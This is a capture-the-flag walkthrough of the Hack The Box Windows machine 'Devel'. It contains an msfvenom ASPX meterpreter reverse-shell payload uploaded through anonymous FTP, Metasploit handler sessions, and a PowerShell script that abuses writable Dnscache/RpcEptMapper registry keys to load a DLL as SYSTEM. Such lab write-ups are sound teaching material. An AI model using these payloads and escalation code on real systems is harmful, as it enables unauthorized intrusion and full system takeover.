
Hack The Box - Devel

Challenge description

https://app.hackthebox.com/machines/Devel

This VM is an easy Windows machine

Reconnaissance / Enumeration

Port scanning and service identification

$ rustscan -a $ip -r 1-65535 --ulimit 5000 -- -A -sC -Pn
[...]
PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
80/tcp open  http    syn-ack Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We have Microsoft's FTP service and an IIS 7.5 web server on the same host. The anonymous FTP listing (aspnet_client, iisstart.htm, welcome.png) is exactly the default content of an IIS wwwroot, which strongly suggests the FTP root is the web root.

Web Enumeration

There's not much to discover here: the site is the IIS 7 default page.

FTP Enumeration

The FTP server accepts anonymous logins. Even better, it gives us write access to the site root folder, so anything we upload is served by IIS. A quick way to confirm both facts before uploading anything noisy is to put a harmless text file over FTP and request it over HTTP on port 80: if it comes back, the FTP root is the web root and uploads are allowed.

Exploitation && Foothold

Let's create a meterpreter payload as an ASPX file (IIS executes .aspx pages server-side when they are requested over HTTP) and upload it over FTP:

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f aspx > h3xshell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2713 bytes

$ ftp $ip
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:h3x): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put h3xshell.aspx
local: h3xshell.aspx remote: h3xshell.aspx
229 Entering Extended Passive Mode (|||49211|)
150 Opening ASCII mode data connection.
100% |****************************************************************************************************************|  2748       23.60 MiB/s    --:-- ETA
226 Transfer complete.
2748 bytes sent in 00:00 (143.79 KiB/s)

Now that the payload is in the web root, start a Metasploit handler for the same payload, request http://10.10.10.5/h3xshell.aspx in a browser so IIS executes it, and wait for the shell:

$ msfconsole

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set rhosts 10.10.10.5
rhosts => 10.10.10.5
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[*] Sending stage (175174 bytes) to 10.10.10.5
Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.5:49277 ) at 2022-01-19 04:11:20 +0000

meterpreter > shell
Process 516 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web

Privilege Escalation

The shell runs as the application-pool identity iis apppool\web, so we need to escalate. On this unpatched Windows 7 build (6.1.7600) the registry keys of two services, Dnscache and RpcEptMapper, have DACLs that let a low-privileged account create subkeys under them. A service key may carry a Performance subkey whose Library value names a DLL exporting the routines listed in its Open, Collect and Close values; when performance data is queried (for example through the Win32_Perf WMI classes), the performance provider host loads that DLL, and on this build it runs as SYSTEM. Creating such a subkey that points to a malicious DLL therefore yields code execution as NT AUTHORITY\SYSTEM.

The technique comes from Clément Labro's (itm4n) research on the insecure RpcEptMapper/DnsCache registry permissions, and the exploit is well described in his write-up.

There's a Metasploit module that implements it (alongside the classic weak-service-permission checks): exploit/windows/local/service_permissions
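Before handing the job to Metasploit it is worth seeing the two halves of the bug yourself: which service keys our identity can actually write to, and what the Performance subkey trigger looks like. The following PowerShell is an added example written for this page; it is not the post's own code nor the Metasploit module. It is meant to be run from the iis apppool\web shell (powershell.exe on the target). The DLL path C:\inetpub\wwwroot\perf.dll and the export names OpenPerfData/CollectPerfData/ClosePerfData are placeholders for a DLL you build yourself; they are not on the original page.

```powershell
# Added example (not from the original post or the Metasploit module).
# Run from the "iis apppool\web" shell on the target.
# Assumption: the DLL path passed to Invoke-PerformanceDllLoad is your own DLL that
# exports the three routines named in the Open/Collect/Close values.

$ServicesRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'

# Rights that let a principal plant a Performance subkey or change a service's values.
$WriteMask = [int][System.Security.AccessControl.RegistryRights]::CreateSubKey -bor `
             [int][System.Security.AccessControl.RegistryRights]::SetValue

# Our identity plus every group it belongs to, so we can match the ACEs that apply to us
# (an app-pool account is not INTERACTIVE, but it is an Authenticated User).
function Get-MyPrincipals {
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $names = @($id.Name)
    foreach ($sid in $id.Groups) {
        try   { $names += $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $names += $sid.Value }   # logon-session SIDs and the like do not translate
    }
    $names
}

# 1. Enumerate service keys whose DACL grants one of our principals CreateSubKey or SetValue.
#    Keys we cannot read (no READ_CONTROL) are skipped silently.
function Find-WeakServiceKeys {
    $mine = Get-MyPrincipals
    foreach ($key in (Get-ChildItem $ServicesRoot -ErrorAction SilentlyContinue)) {
        $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if (([int]$ace.RegistryRights -band $WriteMask) -eq 0) { continue }
            if ($mine -contains $ace.IdentityReference.Value) {
                New-Object PSObject -Property @{
                    Service   = $key.PSChildName
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.RegistryRights
                }
            }
        }
    }
}

# 2. Reproduce what the module did: register a performance DLL under a writable service
#    key and make the WMI performance provider (SYSTEM on this build) load it.
function Invoke-PerformanceDllLoad {
    param([string]$Service, [string]$DllPath)
    $perf = Join-Path $ServicesRoot "$Service\Performance"
    if (Test-Path $perf) { throw "$Service already has a Performance key; refusing to overwrite it" }
    New-Item -Path $perf -Force | Out-Null
    New-ItemProperty -Path $perf -Name Library -Value $DllPath          -PropertyType String | Out-Null
    New-ItemProperty -Path $perf -Name Open    -Value 'OpenPerfData'    -PropertyType String | Out-Null
    New-ItemProperty -Path $perf -Name Collect -Value 'CollectPerfData' -PropertyType String | Out-Null
    New-ItemProperty -Path $perf -Name Close   -Value 'ClosePerfData'   -PropertyType String | Out-Null
    # Querying a Win32_Perf class makes the provider host load every registered performance DLL.
    Get-WmiObject -Class Win32_Perf -ErrorAction SilentlyContinue | Out-Null
    # Remove the key afterwards so the host is left as we found it.
    Remove-Item -Path $perf -Recurse -Force
}

Find-WeakServiceKeys | Format-Table Service, Principal, Rights -AutoSize
# Invoke-PerformanceDllLoad -Service 'Dnscache' -DllPath 'C:\inetpub\wwwroot\perf.dll'   # placeholder DLL path
```

On a vulnerable build the first function should list Dnscache and RpcEptMapper with a principal such as Authenticated Users; the second function creates the same HKLM\System\CurrentControlSet\Services\Dnscache\Performance key that the Metasploit output below reports, triggers the load, and then deletes it, which the module does not do for you.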

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/service_permissions
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/service_permissions) > set session 1
session => 1
msf6 exploit(windows/local/service_permissions) > set lhost tun0
lhost => tun0
msf6 exploit(windows/local/service_permissions) > run

[*] Started reverse TCP handler on 10.10.14.5:4444
[*] Trying to add a new service...
[*] Trying to find weak permissions in existing services..
[+] [Dnscache] Created registry key: HKLM\System\CurrentControlSet\Services\Dnscache\Performance
[*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 4 opened (10.10.14.5:4444 -> 10.10.10.5:49271 ) at 2022-01-19 02:02:05 +0000

meterpreter > shell
Process 728 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system

c:\Users\babis\Desktop>more user.txt.txt
more user.txt.txt
(redacted)

C:\Windows\system32>more c:\users\administrator\desktop\root.txt
more c:\users\administrator\desktop\root.txt
(redacted)

Thanks for reading <3

h3x

This post is licensed under CC BY 4.0 by the author.